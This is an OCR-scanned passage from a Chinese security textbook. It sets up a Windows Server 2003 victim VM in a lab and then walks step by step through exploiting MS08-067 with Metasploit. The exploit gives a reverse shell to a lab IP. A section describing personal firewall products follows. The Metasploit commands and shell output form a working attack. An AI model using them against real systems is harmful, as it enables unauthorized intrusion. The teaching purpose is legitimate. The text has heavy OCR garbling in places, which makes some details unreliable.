像 文件 (iso) (M) ”选项 ,通过 “浏览 ”找到 刚才 下 载 好 的 系统 镜像 文件 并 添加 ,然后 单 击 " 下 
一 步 ? 按 钮 。 

(6) 如 图 5. 2.4 所 示 , 此 时 进入 的 是 简易 安装 信息 界面 ,需要 输入 一 个 系统 的 产品 密 
钥 , 可 以 选择 此 时 输入 ;也 可 以 直接 单 击 “ 下 一 步 * 按 钮 , 即 在 虚拟 机 中 安装 系统 的 时 候 再 输 
入 。 两 种 方法 都 可 以 ,没有 影响 。 
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新 建 虚拟 机 向 导 im 





欢迎 使 用 新 建 虚拟 机 向 导 
WORKSTATION 您 希望 使 有 什么 类 型 的 配置? 
ELEM D 
ia oe RAGED) 


通过 几 个 简单 的 步骤 创建 Workstation 12.0 


9 自 定义 (高 级 9 
GREAT SCSI 控制 器 类 型 、 虚 拟 磁盘 类 型 
以 及 与 旧版 VMware 产品 兼容 性 等 高 级 选项 
的 虚拟 机 。 


























帮助 | 上 一 步 (B) | Lp)» 取消 
图 521 Memes" 窗口 
新 建 虚拟 机 向 导 
选择 虚拟 机 硬件 兼容 性 
该 虚拟 机 需要 何 种 硬件 功能 ? 
虚拟 机 硬件 兼容 性 
硬件 兼容 性 (H): 
Au ESX Server(S) 
兼容 产品 : 限制: 
Fusion 8.x a 64 GB ATE ^ 
Workstation 12.0 16 个 处 理 器 
10 个 网 络 适 配器 
8 TB 磁盘 大 小 
can 区] pwa) (aa) 




















图 522 选择 虚拟 机 硬件 兼容 性 ”界面 


。 134 。 


(7) 在 


T Opt 


(8) 在 


rae 
安装 客户 机 操作 系统 
虚拟 机 如 同 愧 理 机 ， 需 要 操作 系统 。 您 将 如 何 安装 客户 机 操作 系统 ? 





PERE: 
ORBERHRO): 
[eld pvo nw genes (F:) - 








(© 安装 程序 光盘 映像 文件 (soXM): 
EAR TSflen_windows server 2003 enterprse vso ~ [E0] 


d) 已 检测 到 Windows Server 2003 Enterprise Edition e 
该 操作 系统 将 使 用 简易 安装 。 (这 是 什么 ?) 


O 稍 后 安装 操作 系统 (5)。 











MENNAN- 




















图 523 ”安装 客户 机 操作 系统 ”界面 


saec ss 
简易 安装 信息 
这 用 于 安装 Windows Server 2003 Enterprise Edition。 








Windows 产品 密 钥 (K) 
XDCTK-FIX33-FX3QX-RC8QR-WC68M 





个 性 化 Windows 
220: [te | 












































图 524 简易 安装 信息 界面 


图 5. 2. 区 命名 虚拟 机 ?界面 的 “虚拟 机 名 称 (V) ”选项 中 全 部 选择 系统 默认 的 设 
下 一 步 ?按钮 。 
出 现 的 如 图 5. 2.6 所 示 的 处 理 器 配置 界面 中 ,可 以 根据 自己 实验 平台 的 硬件 条 





件 , 自 行 决定 "处 理 器 数量 ?以 及 “每 个 处 理 器 的 核心 数量 (C) "的 具体 值 。 本 次 实验 使 用 的 
是 默认 值 , 单 击 “ 下 一 步 ?按钮 。 
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ae gg 
命名 虚拟 机 
您 要 为 此 虚拟 机 使 用 什么 名 称 ? 











虚拟 机 名 称 (V): 

| Nindows Server 2003 Enterprise 
位 置 (LD): 
Ci\Users\jiye\Documents\Virtual Machines\Windows Server 2003 £ CEO.) 
在 编辑 "> 首选 项 HEER RR e 





























图 525 “SAEN” FA 



































SRE 
为 此 虚拟 机 指定 处 理 器 数量 。 
处 理 器 
ABER) Eee 
SHMEREE OME O: amc] 
总 处 理 器 核心 数量 : 1 














图 526 “处理 器 配置 "界面 


(9) 在 如 图 5.2.7 所 示 的 “此 虚拟 机 的 内 存 (M) ”界面 中 ,同样 可 以 根据 自己 实验 平台 
的 硬件 条 件 ,为 虚拟 机 设置 内 存 大 小 。 本 次 实验 选用 的 是 1024MB, 单 击 “ 下 一 步 ”按钮 。 
(10) 在 如 图 5.2.8 所 示 的 “网 络 类 型 "界面 的 “网 络 连 接 ” 选 项 中 ,为 虚拟 机 选择 “使 用 
网 络 地 址 转换 NAT(E)” 模 式 , 单 击 “ 下 一 步 " 按 钮 。 
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vases NE NN 
此 虚拟 机 的 内 存 
您 要 为 此 虚拟 机 使 用 多 少 内 存 ? 








指定 分 配给 此 虚拟 机 的 内 存量 。 内 存 大 小 必须 为 4 MB 的 倍数 





aw - 此 虚拟 机 的 内 存 (M): 1024 $| MB 




















A * 卓 最 大 推荐 内 存 : 








268 6372 MB 
1GB 
512M8 a” 推荐 内 存 : 
256 MB 384 MB 
128 MB 


3 
64MB O 客户 机 操作 系统 最 低 推荐 内 存 ; 
128 MB 


























E527 ” 屁 虚 拟 机 的 内 存 " 界 面 





sanoo c 
网 络 类 型 | 
要 添加 哪 类 网 络 ? 





网 络 连接 


O 使 用 桥接 网 络 (R) 
为 客户 机 操作 系统 提供 直接 访问 外 部 以 太 网 网 络 的 权限 。 客 户 机 在 外 部 网 络 上 必须 
有 自己 的 ite 


(© 使 用 网 络 地 址 转换 (NA- 
por 主机 IP 地 址 访问 主机 拨号 连接 或 外 部 以 太 网 网络 连接 的 





O 使 用 仅 主机 模式 网 络 (H) 
将 客户 机 操作 系统 连接 到 主机 上 的 专用 虚拟 网 络 * 


日 不 使 用 网 络 连 接 (T) 





























Ca [«x-9m)(r-sum»][ m» ] 
E528 WARE m 











C11) 在 如 图 5.2.9 所 示 的 “选择 L/O 控制 器 类 型 ?界面 的 “SCSI 控制 器 ?选项 中 ,选择 
软件 推荐 的 LST Logic(L) 单 选项 ,然后 单 击 “下 一 步 ? 按 钮 。 

(2) 在 如 图 5. 2. 10 所 示 的 “选择 磁盘 类 型 "界面 的 “虚拟 磁盘 类 型 "选项 中 ,同样 选择 
软件 推荐 的 SCSI(S) 选 项 ,然后 单 击 “ 下 一 步 ” 按 钮 。 
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ames 0 Us 
kf 1/0 rela emt 
您 要 使 用 何 种 类 型 的 SCSI 控 制 器 ? 








Vo 控制 器 类 型 

SCSI 控制 器 : 
日 BusLogic(U) (最 大 磁盘 容 里 : 2 TB) 
S LSILogk(L) GEF) 
© LSI Logic SAS(S) 


























Cm Ei) swa) m^ .] 
图 529 SER IO 控制 器 类 型 "界面 





























(C Ei) ES (ma) 
图 5210 ”选择 磁盘 类 型 界面 














(13) 在 如 图 5.2.11 所 示 的 “选择 磁盘 ”界面 的 “磁盘 ”选项 中 ,选择 “创建 新 虚拟 磁盘 
CV) "模式 , 单 击 “ 下 一 步 ” 按 钮 。 

(14) 在 如 图 5.2. 12 所 示 的 “指定 磁盘 容量 ”界面 的 “最 大 磁盘 大 小 (GB)(S)" 选 项 中 ， 
同样 使 用 软件 建议 的 40.0, 当 然 ,磁盘 大 小 可 以 根据 自己 硬件 条 件 进行 调整 。 不 建议 勾 选 
“立即 分 配 所 有 磁盘 空间 ”, 因 为 根据 使 用 大 小 再 分 配 磁盘 空间 大 小 完全 够 用 ,并 不 会 影响 使 
用 效果 。 接 下 来 , 色 选 “将 虚拟 磁盘 拆 分 成 多 个 文件 (M)” 选 项 , 单 击 “ 下 一 步 " 按 钮 。 
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EES HA UA 
ARRA 
您 要 使 用 哪个 详 盘 ?7 








磁盘 
© 创建 新 虚拟 磁盘 (V) 


虚拟 磁盘 由 主机 文件 系统 上 的 一 个 或 多 个 文件 组 成 ， 客 户 机 操作 系统 会 将 其 视 为 单 
个 硬盘 。 虚拟 磁盘 可 在 一 台 主机 上 或 多 台 主 机 之 间 径 松 复制 或 移动 * 


© 使 用 现 有 虚拟 研 盘 (E) 
选择 此 选项 将 重新 使 用 之 前 配置 的 磁盘 。 


© 使 用 物理 亚 盘 (适用 于 高 级 用 户 XP) 
选择 此 选项 将 为 虚拟 机 提供 直接 访问 本 地 硬盘 的 权限 。 
































Ca ES) hwa) m^ ] 
图 5211 创建 虚拟 磁盘 


指定 磁盘 音量 | 
磁盘 大 小 为 多 少 ? 








最 大 磁盘 大 小 (GB)(S): 40.0 2] 
针对 Windows Server 2003 Enterprise Edition 的 建议 大 小 : 40 GB 

















回 立即 分 配 所 有 磁盘 空间 (A)。 


分 配 所 有 容量 可 以 提高 性 能 ， 但 要 求 所 有 物理 碰 盘 空间 立即 可 用 。 如 果 不 立 即 分 配 
所 有 空间 ,虚拟 磁盘 的 空间 最 初 很 小 , 会 随 着 您 向 其 中 添加 数据 而 不 断交 大 。 


© 将 虚拟 磁盘 存储 为 单个 文件 (9) 





guar s CIOL GATE MI 但 可 能 会 降低 大 容 里 磁盘 的 



































Cas] Et | [FEED>] m ) 
5212 设置 磁盘 大 小 

















(15) 在 如 图 5.2. 13 所 示 的 “指定 磁盘 文件 ”界面 中 同样 选择 软件 默认 的 文件 名 称 和 磁 
盘 文 件 存储 地 址 , 单 击 “ 下 一 步 ” 按 钮 。 
(16) 此 时 软件 会 提示 已 准备 好 创建 虚拟 机 , 单 击 “ 完 成 ”按钮 ,系统 会 自动 开启 此 虚 
拟 机 。 
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mess GEAR — 8 
指定 磁盘 文件 
pd 








磁盘 文件 


将 为 每 2 GB 容 里 的 虚拟 磁盘 创建 一 个 谱 盘 文件 。 除 第 一 个 文件 之 外 ， 每 个 文件 的 文件 
名 称 将 根据 此 处 所 提供 的 文件 名 称 自动 生成 *。 





Windows Server 2003 Enterprise Edition.vmdk EM 



































Cum («5-9 ) [25007] [m 
图 5213 指定 磁盘 文件 




















已 准备 好 创建 虚拟 机 
单 击 "完成 “ 建 虚 拟 机 ， 并 开始 去 装 Windows Server 2003 Enterprise 
Edition 和 VMware Tools 
将 使 用 下 列 设置 创建 虚拟 机 : 
名 称 : Windows Server 2003 Enterprise Edition 
位 置 : C:\Users\jiye\Documents\Virtual Machines\Windows Server... 
版 本 : Workstation 12.0 
操作 系统 : Windows Server 2003 Enterprise Edition 
Ba: 40 GB, 拆 分 
内 存 : 1024 MB 
网 络 适配器 : NAT 
CD/DVD, USB 控制 器 , 打印 机 , 声卡 


























5214 安装 完成 


(17) 新 建 的 虚拟 机 开启 后 会 进入 Windows Setup 界面 ,如 图 5. 2. 15 所 示 。 然 后 .虚拟 
机 自动 安装 好 系统 。 
(18) 系统 安装 过 程 会 比较 长 ,不 过 基本 不 需要 操作 就 会 将 Windows Server 2003 系统 
安装 到 该 虚拟 机 中 ,安装 Windows Server 2003 界面 如 图 5.2.16 所 示 。 
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他 主页 Windows Server 2003 Ent... 


Windows Setup 


Setup is loading files (CardBus/PCMCIA IDE Miniport Driver)... 








^R] 








5215 启动 虚拟 机 





从 主页 关 | (E? Windows Server 2003 Ent. x 


:了 Windows 


CMM The Windows Server 2003 family 
provides the most productive 

Dynamic Y 

Update infrastructure platform for 

Preparing powering networks, applications， 

kataka and Web services 


Setup will complete in 
approximately: 
39 minutes 





5216 安装 Wndows Server 2008 


(19) 如 图 5. 2.17 Brzs » Windows Server 2003 系统 安装 好 后 ,一 般 VMware 软件 会 为 
其 自动 分 配 一 个 IP 地 址 。 为 了 后 面 的 实施 攻击 实验 部 分 能 够 顺利 进行 ,这 里 对 系统 的 IP 
地 址 进行 修改 ,在 Windows Server 2003 系统 的 cmd 窗口 中 输入 以 下 命令 即 可 : 








netsh interface IP set address local static 10.10.10.130 255.255.255.0 
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Documents and S fidministrator>netsh interface IP set address local st 
-10.180.138 25 5.8 


\Administrator> 





图 5217 Wndows Server 2008 系 统 安装 完成 


至 此 ,Windows Server 2003 SPO 靶 机 架设 已 经 完成 ， 

2. 实施 攻击 

(D 在 BT5 终端 窗口 启动 Metasploit 终端 ,进入 后 使 用 search 命令 搜索 该 漏洞 相应 的 
模块 ,具体 的 命令 如 下 : 


root@ bt:~ 4 msfoonsole 


msf> search ms08_067 


搜索 ms08_067 模块 的 结果 如 下 : 


Matching Modules 
Name Disclosure Date Rank Description 
exploit/windows/smib/ms08 067 netapi 2008- 10- 28 00:00:00 UIC great Microsoft Server Service 


Relative Path Stack Corruption 


从 输出 结果 可 以 看 出 ,相应 的 渗透 攻击 模块 路 径 为 exploit/windows/smb/ms08_067_ 
netapi, 并 且 该 模块 由 T" 类 型 .目标 平台 、 目 标 服务 和 模块 名 字 等 4 部 分 组 成 。 

(2) 启用 模块 (包括 模块 所 使 用 的 攻击 载荷 模块 ) 来 查看 基本 信息 ,并 选择 其 中 的 一 个 
ilii inco ind 命令 如 下 : 

。 通过 上 一 步 中 查找 到 的 攻击 模块 路 径 来 启用 该 攻击 模块 。 





mef» use exploit/windows/srb/ms08_067_netapi 
。 查看 模块 的 基本 信息 。 
msf exploit(ms08 067 netapi)» show payloads 


攻击 载荷 模块 的 基本 信息 如 下 : 
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Compatible Payloads 


Name Disclosure Date Rank Description 

generic/custan nomml  Custam Payload 

generic/debug trap nomal Generic x86 Debug Trap 

generic/shell bind tcp normal Generic Command Shell, Bind TCP Inline 
gereric/arell reverse top mml ”Generic Command Sell, Reverse TCP Inline 


由 于 篇 幅 限制 ,这 里 仅 列 出 包括 下 面 要 用 到 的 generic/shell_reverse_tcp 模块 以 及 其 中 
的 几 个 攻击 载荷 模块 ,剩余 的 自己 利用 互联 网 资源 来 了 解 , 这 里 就 不 一 一 列 出 了 。 
。 使 用 set payload 命令 来 指定 所 选择 的 攻击 载荷 。 


msf exploit (ms08 067 netapi)> set payload generic/shell reverse tcp 
设置 后 的 界面 显示 如 下 所 示 : 
payload > generic/shell_reverse_ tcp 


(3) 查看 配置 渗透 攻击 所 需要 的 配置 选项 ,具体 命令 如 下 。 
。 使 用 show options 命令 ,显示 所 需要 配置 的 选项 信息 。 


msf exploit (ms08_067_netapi)> show cptions 
所 需要 配置 的 选项 具体 信息 如 下 : 


Module options (esploit/windcws/snrb/ms08 067 netapi): 
Name Current Setting Required Description 


RHOST yes The target address 
RECRT 445 yes Set the SMB service port 
SMBPIPE BROWSER yes ‘The pipe name to use (BROWSER, SRVS\C) 


Name Current Setting Required Description 


IHOST yes The listen address 

IECRT 4444 yes ‘The listen port 
Exploit target: 

Id Name 


可 以 看 出 ,默认 SMB 服务 端口 已 经 设置 为 445, 管 道 名 称 已 经 设置 为 BROWSER ,而 监 
听 端 口 也 已 经 设置 为 4444。 当 然 ,这 些 默认 值 都 可 以 在 设置 时 通过 重新 设置 来 进行 修改 ， 
本 次 并 不 需要 这 么 做 。 
。 使 用 show targets 命令 ,显示 该 渗透 攻击 模块 可 以 成 功 渗透 攻击 的 目标 平台 。 
msf exploit (ms08 067 netapi)> show targets 
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使 用 show targets 命令 后 ,渗透 攻击 的 目标 平台 详细 信息 如 下 : 


Windows XP SPO/SPL Universal 
Windows XP SP2 English (Alwayson NX) 
Windows XP SP2 English (Nx) 
Windows XP SP3 English (AlwaysOn NX) 
Windows XP SP3 English (NK) 
Windows 2003 SPO Universal 
Windows 2003 SPl English (NO NX) 
Windows 2003 SP1 English (NX) 

10 Windows 2003 SPl Japanese (NO NK) 

上 面 只 列 出 所 支持 的 67 种 目标 平台 中 的 11 种 ,其 中 就 有 本 次 实验 安装 的 靶 机 
Windows Server 2003 SP0, 其 序号 为 7, 这 在 下 面 的 设置 中 需要 用 到 。 第 0 种 对 应 的 是 
Automatic Targeting, 它 表示 的 是 攻击 模块 可 以 自动 判断 目标 类 型 ,并 自动 选择 最 合适 的 目 
标 选 项 进行 攻击 。 当 然 ,这 是 在 不 知道 目标 系统 类 型 的 情况 下 使 用 的 选项 ,如 果 已 经 知道 目 
标 系 统 的 类 型 ,建议 使 用 其 相应 的 序号 ,不 要 使 用 自动 选择 选项 。 

(4) 根据 目标 情况 配置 渗透 攻击 的 各 个 选项 ,具体 的 选项 设置 如 下 。 

。 使 用 set rhost 命令 设置 目标 地 址 。 


wo 0o -10 0 60 ^o 


mef exploit(ns08 067 netapi)» set rhost 10.10.10.130 
设置 后 软件 提示 如 下 : 

rhost= > 10.10.10.130 

。 使 用 set lport 命令 设置 监听 端口 。 

mef exploit trs08 067_netapi)> set lport 5000 
设置 后 软件 提示 如 下 : 

lport- > 5000 

。 使 用 set lhost 命令 设置 监听 地 址 。 

msf exploit (ms08_067_netapi)> set lhost 10.10.10.128 
设置 后 软件 提示 如 下 : 

lhost-» 10.10.10.128 

。 使 用 set target 命令 设置 目标 系统 的 类 型 。 


nsf exploit ns08 067 netapi)> set target 7 
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设置 后 软件 提示 如 下 : 

target-» 7 

在 前 面 已 经 看 到 默认 的 攻击 端口 是 445, 在 这 里 就 不 进行 修改 了 。 有 了 攻击 IP 和 攻击 
端口 ,在 攻击 成 功 之 后 ,后 门 会 回 连 到 控制 主机 , 即 IP 地 址 为 10. 10. 10. 128 的 BTS 机 的 
5000 端口 。 至 此 ,攻击 端的 基本 设置 已 经 完成 。 

(5) 设置 结束 后 ,再 次 检查 各 个 选项 的 设置 情况 ,以 确保 没有 错误 。 具 体 命令 如 下 。 

再 次 使 用 show options 命令 查看 所 设置 的 详细 信息 。 

msf exploit (ms08 067 netapi)> show cpticns 

设置 后 软件 提示 详细 信息 如 下 : 

Module options (exploit/windows/smb/ms08 067 netapi): 

Name Current Setting Required Description 


RHOST = 10. 10.10.130 yes The target address 
REORT 445 yes Set the SMB service port 
SVBPIPE BROWSER yes ‘The pipe name to use (BROWSER, SRVSVC) 


Payload options (generic/shell reverse tqp): 
Name Current Setting Required Description 


IHOST 10.10.10.128 yes The listen address 

IFORT | 5000 yes The listen port 
Exploit target: 

Id Name 


可 以 看 出 ,此 时 的 选项 已 经 设置 为 所 想 要 的 设置 。 下 面 就 是 最 重要 的 攻击 部 分 。 

(6) 使 用 攻击 命令 发 起 渗透 攻击 ,具体 命令 如 下 。 

。 使 用 exploit 命令 发 起 渗透 攻击 。 

mef exploit (ms08_067_netapi)> exploit 

使 用 攻击 命令 后 命令 行 窗口 显示 信息 如 下 : 

[* ] Started reverse handler on 10.10.10.128:5000 

[* ] Attempting to trigger the vulnerability... 

Microsoft Windows [Version 5.2.3790] 

(C) Copyright 1985- 2003 Microsoft Corp. 

C:\WINDOWS\ system32» 

可 以 看 出 ,基本 是 在 瞬间 攻击 模块 已 经 获得 了 目标 系统 的 控制 会 话 , 并 且 将 当前 命令 行 
光标 自动 切换 到 目标 系统 的 会 话 中 的 Shell ,也 就 是 目标 系统 的 cmd 命令 行 。 

。 使 用 基本 的 Shell 命令 ipconfig/all 对 获取 的 会 话 进行 验证 。 


C:\WINDOWS\ system32> ipoonfig/all 
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使 用 Shell 命令 ipconfig/all 后 命令 行 信息 如 下 : 


i roct- tvi8Gubeh 
Primary Ins Suffix........... 
Bodo IO uere ree ese OR So e erp Unknown 
IP Rating Enabled. .......... No 
WINS Proxy Enabled. .......... No 

Ethernet adapter Local Area Connection 
Connection- ”—>“ specific INS Suffix. 
ienis n e PEA EENET ELTETT : Intel(R) PRO/1000 MT Network Connection 
Physical Address. ........... : 00- OC- 29- A4- 8F- 4A 
BEEP Erebledi. eos, aom ec ess Ry one : No 
WAG Gr Sasa eink le ae RS eR : 10.10.10.130 
NG DESIG Lu sec] aCR access. oe : 255.255.255.0 
potant Gateway e eie aaa : 10.10.10.2 
[i : 10.10.10.2 


可 以 看 出 ,使 用 攻击 命令 如 同 通 过 目标 系统 进入 cmd 命令 行 一 样 地 通过 了 攻击 机 使 用 
目标 系统 的 带 权限 的 命令 。 
实验 报告 要 求 


。 实验 目的 。 

* 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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第 6 童 By g 


6.1 防火 墙 技术 


防火 墙 是 一 类 防范 措施 的 总 称 。 所 谓 “ 防 火 墙 ”, 是 指 一 种 将 内 联网 和 公众 访问 网 (互联 
网 ,internet) 分 开 的 方法 , 它 使 得 内 联网 与 互联 网 互相 隔离 ,限制 网 络 互 访 来 保护 内 部 网 络 。 
它 是 一 个 或 一 组 由 软件 和 硬件 构成 的 系统 ,是 在 两 个 网 络 通信 时 执行 的 一 种 访问 控制 规则 ， 
防止 重要 信息 被 更 改 、 复 制 或 毁坏 。 设置 防火 墙 目 的 都 是 为 了 在 内 部 网 络 与 外 部 网 络 之 间 
设立 唯一 的 通道 ,简化 网 络 的 安全 管理 。 


6.1.1 防火 墙 技术 基本 概念 


防火 墙 是 一 个 网 络 安全 专用 词 , 它 是 在 内 部 网 络 ( 或 局 域 网 ) 和 互联 网 之 间 , 或 者 是 内 部 
网 络 的 各 部 分 之 间 实 施 安全 防护 的 系统 ,通常 由 硬件 设备 (路 由 器 .网 关 、 堡 又 主机 和 代理 服 
务 器 ) 和 防护 软件 等 共同 组 成 。 在 网 络 中 它 可 对 信息 进行 分 析 、 隔 离 和 限制 ,从 而 保护 网 络 
运行 安全 。 

防火 墙 的 体系 结构 主要 包括 如 下 几 个 部 分 。 

(1) 屏蔽 路 由 器 (screening router) : 它 是 防火 墙 最 基本 的 构件 ,可 以 由 路 由 器 实现 ,也 
可 以 用 主机 来 实现 。 屏 蔽 路 由 器 作为 内 外 连接 的 唯一 通道 ,要 求 所 有 报 文 都 必须 在 此 通过 

(2) SU EBL XK (dual homed gateway): 这 种 配置 是 用 一 台 装 有 两 块 网 卡 的 堡垒 主 
机 做 防火 墙 。 其 两 块 网 卡 各 自 与 受 保护 的 内 部 网 络 和 外 部 网 络 相 连 ,其 防火 墙 软件 可 以 转 
发 应 用 程序 .提供 服务 等 。 

G) 屏蔽 主机 网 关 (screened host gateway): 屏蔽 主机 网 关 易 于 实现 ,也 很 安全 ,应 用 
广泛 。 这 种 网 关 的 基本 控制 策略 由 安装 在 上 面 的 软件 决定 。 

(4) 被 屏蔽 子 网 (screened subnet): 这 种 方法 是 在 内 部 网 络 和 外 部 网 络 之 间 建 立 一 个 
被 隔离 的 子 网 ,用 两 台 分 组 过 滤 路 由 器 将 这 一 子 网 分 别 与 内 部 网 络 和 外 部 网 络 分 开 。 

防火 墙 的 作用 如 下 : 

(1) 取消 或 拒绝 任何 未 被 明确 允许 的 软件 包 通过 。 

(2) 将 外 部 用 户 保持 在 内 部 网 络 之 外 ,对 外 部 用 户 访问 内 部 网 络 做 出 限制 。 

(3) 强制 执行 注册 、 审 计 和 报警 等 。 


6.1.2 个 人 防火 墙 


主流 防火 墙 产 品 包括 天 网 防火 墙 \ 诺 顿 防火 墙 \ 江 民 防 火 墙 、 金 山 网 杀 和 瑞星 个 人 防 
火 墙 。 
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6.1.2.1 天 网 防火 墙 


天 网 防火 墙 是 由 天 网 安全 实验 室 研发 制作 给 个 人 计算 机 使 用 的 网 络 安 全 工具 。 它 根据 
系统 管理 者 设 定 的 安全 规则 (security rules) 防 护 网 络 ,提供 强大 的 访问 控制 \ 应 用 选 通 、 信 
息 过 滤 等 功能 。 能 够 抵挡 网 络 入 侵 和 攻击 ,防止 信息 泄露 ,保障 用 户 计算 机 的 网 络 安全 。 天 
网 防火 墙 把 网 络 分 为 本 地 网 和 互联 网 ,可 以 针对 来 自 不 同 网 络 的 信息 设置 不 同 的 安全 方案 。 

天 网 防火 墙 具 有 如 下 特征 : 

CD 严密 的 实时 监控 。 防 火 墙 会 监控 来 自 外 部 的 安全 威胁 ,过 滤 掉 所 有 未 授权 的 连接 ， 
时 刻 保 护 系 统 安全 。 

(2) 灵活 的 安全 规则 。 通 过 防火 墙 的 规则 设置 面板 ,可 以 方便 地 对 防火 墙 规则 进行 增 
加 、 删 除 和 修改 ,可 以 根据 自身 需要 去 制定 相应 的 规则 。 官 方 会 根据 网 络 安全 环境 不 定时 升 
级 最 新 规则 库 。 

(3) 便利 的 应 用 程序 规则 设置 。 拒 绝 任何 未 经 授权 的 内 部 程序 连接 网 络 , 从 而 阻 断 了 
所 有 病毒 木马 泄露 秘密 信息 。 

(4) 详细 的 访问 记录 和 完善 的 报警 系统 。 遇 到 安全 威胁 即 发 出 报警 ,并 记录 攻击 来 源 
及 其 攻击 类 型 等 信息 ,在 第 一 时 间 掌 握 系统 的 安全 情况 。 

C5) 独创 的 扩展 安全 级 别 。 无 须 对 防火 墙 进行 烦琐 的 设置 ,只 要 把 安全 级 别 调 成 “ 扩 
展 ? 级 别 即 可 ,每 当 有 最 新 规则 ,防火 墙 会 自动 联网 升级 。 

(6) 完善 的 密码 保护 措施 。 查 看 、 修 改 和 关闭 防火 墙 均 需要 提供 密码 ,防止 了 病毒 或 黑 
客 恶 意 关闭 防火 墙 以 制造 安全 漏洞 。 

(7) 稳定 的 进程 保护 。 进 程 保护 可 以 使 防火 墙 的 进程 享受 超越 系统 级 的 安全 待遇 , 保 
护 防 火 墙 的 进程 不 被 恶意 关闭 。 

(8) 智能 的 入侵 检测 。 针 对 密集 的 攻击 ,防火墙 会 自动 判断 并 将 攻击 源 加 入 列表 ,静默 
该 攻击 源 。 一 旦 攻击 源 被 加 入 静默 列表 ,所 有 来 自 这 里 的 攻击 一 律 被 屏蔽 。 


6.1.2.2 诺顿 防火 墙 


诺顿 防火 墙 是 由 赛 门 铁 克 公司 提供 的 一 款 功能 强大 的 防火 墙 。 诺顿 防火 墙 所 集成 的 功 
能 相当 丰富 ,除了 作为 基础 的 防火 墙 功能 ,入 侵 检 测 、 隐 私 保 护 等 功能 也 颇 为 强大 。 诺 顿 防 
火 墙 在 浏览 器 中 集成 了 Web 辅助 功能 插件 ,该 插件 可 以 动态 地 根据 所 浏览 网 站 的 情况 进行 
弹出 广告 窗口 .Applet 和 ActiveX 等 内 容 的 阻塞 ,而 用 户 可 以 针对 单个 网 站 决定 是 否 阻塞 
这 些 内 容 , 同 时 以 关键 字 的 形式 维护 广告 信息 过 滤 清 单 。 另 外 ,该 插件 还 可 以 帮助 用 户 禁 止 
浏览 器 信息 、 访 问 历史 信息 等 泄漏 给 外 部 网 络 。 诺 顿 防 火 墙 所 集成 的 入 侵 检测 组 件 带 有 大 
量 的 攻击 指纹 ,能 够 设 定 在 多 长 时 间 内 阻止 发 起 攻击 的 计算 机 ,其 功能 性 已 经 趋 近 了 专业 的 
入 侵 检测 系统 。 

诺顿 防火 墙 的 定制 能 力 不 单 体现 在 对 防火 墙 规则 的 设 定 上 ,辅助 功能 组 件 的 管理 功能 
也 相当 强大 。 以 人 侵 检 测 指纹 为 例 , 用 户 可 以 决定 哪些 攻击 需要 被 检测 ,而 哪些 需要 被 忽 
略 ; 同 时 ,可 以 选择 发 现 攻击 时 的 告警 方式 。 另 外 ,不 只 防火 墙 具 有 防护 等 级 ,包括 隐私 保护 
等 辅助 功能 在 内 也 可 以 独立 设置 级 别 , 用 户 可 以 快速 简便 地 设 定 计算 机 的 防护 强度 。 

在 整体 设计 上 诺顿 防火 墙 相当 规整 .大量 的 功能 很 好 地 排 布 在 几 个 选项 中 ,相应 的 许多 
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操作 需要 深入 多 个 界面 才能 完成 ,这 也 是 诺顿 防火 墙 操作 负担 较 高 的 主要 原因 。 诺 顿 防火 
墙 为 用 户 提供 了 多 种 应 用 情境 模式 的 选择 ,对 这 些 模 式 诺顿 防火 墙 分 别 赋予 了 不 同 的 规则 
权限 ,初级 用 户 可 以 安全 高 效 地 利用 模式 的 切换 来 调整 对 计算 机 的 保护 。 而 相对 专业 的 基 
于 地 址 和 协议 的 过 滤 条 件 设 定 被 隐藏 在 了 高 级 设置 部 分 ,专业 用 户 在 需要 的 情况 下 可 以 通 
过 该 界面 定义 更 加 复杂 的 防护 策略 。 


6.1.2.3 江 民 防火 墙 


江 民 防火 墙 是 一 款 专 为 解决 个 人 用 户 上 网 安全 而 设计 的 免费 网 络 安全 防护 工具 ,产品 
融和 人 了 先进 的 网 络 访问 动态 监控 技术 ,彻底 解决 黑客 攻击 、 木 马 程序 及 互联 网 病毒 等 各 种 网 
络 危险 的 和 人 侵 ,全 面 保护 个 人 上 网 安全 。 

江 民 防火 墙 具 有 如 下 特征 : 

(1) 全 新 网 络 访问 动态 监控 技术 。 动 态 监 控 黑客 攻击 .木马 程序 .互联 网 病毒 等 危险 ， 
保护 上 网 账号 .QQ 密码 游戏 分 值 银行 账号 .邮件 密码 和 个 人 隐私 等 重要 信息 不 外 泄 。 

(2) 网 络 安 全 级 别 设 定 , 智 能 防 黑客 、 拦 木马 ,有 高 中 、 低 、 自 定义 4 种 安全 级 别 设 定 满 
足 不 同 需求 用 户 的 网 络 安全 选择 ;监视 网 络 数据 流 , 遇 危险 ,报警 提示 。 

(3) 程序 访问 控制 技术 和 网 络 日 志 记录 技术 。 用 户 可 对 本 地 网 络 规则 进行 匹配 设置 ， 
保证 只 有 安全 可 靠 的 访问 才 被 允许 ;详细 记录 网 络 链接 情况 , 留 下 非法 访问 和 未 被 授权 访问 
对 象 详细 的 IP 地 址 。 

(4) 网 络 访问 控制 ,过 滤 不 良 网 站 ,保证 数据 安全 。 通 过 设置 防火 墙 管理 中 的 区 域 访问 
控制 规则 ,可 以 阻止 不 良 网 站 和 受 控 制 网 段 访问 计算 机 ,清洁 网 络 空间 ,保证 数据 安全 。 


6.1.2.4 金山 网 镖 


金山 网 镖 是 一 款 由 金山 毒霸 推出 ,为 个 人 计算 机 量 身 定做 的 网 络 安全 产品 。 它 根据 个 
人 上 网 的 不 同 需要 来 设 定 安全 级 别 , 有 效 地 提供 网 络 流量 监控 ,应 用 程序 访问 网 络 权 限 控 
制 , 病 毒 预 警 以 及 黑客 和 木马 攻击 监测 。 

金山 网 镖 具有 如 下 特征 : 

(1) 全 面 安 全 防护 。 专 业 的 个 人 网 络 防火 墙 ,提供 对 黑客 程序 .木马 和 间谍 软件 以 及 其 
他 恶意 程序 的 拦截 查 杀 , 对 网 络 进行 全 方位 的 保护 。 并 且 还 提供 了 网 络 访问 监控 ,共享 目录 
管理 .不良 网 站 过 滤 等 多 种 网 络 安全 实用 功能 。 

(2) 防 网 络 钓 鱼 。 防 止 钓鱼 网 站 和 钓鱼 邮件 的 攻击 ,用 户 访问 钓鱼 网 站 时 网 镖 会 自动 
拦截 ,防止 用 户 的 账号 、 密 码 等 重要 信息 被 盗 。 

(3) 历史 痕迹 清理 。 帮 助 用 户 预览 并 清理 软件 使 用 的 痕迹 ,避免 重要 文件 .信息 或 个 人 

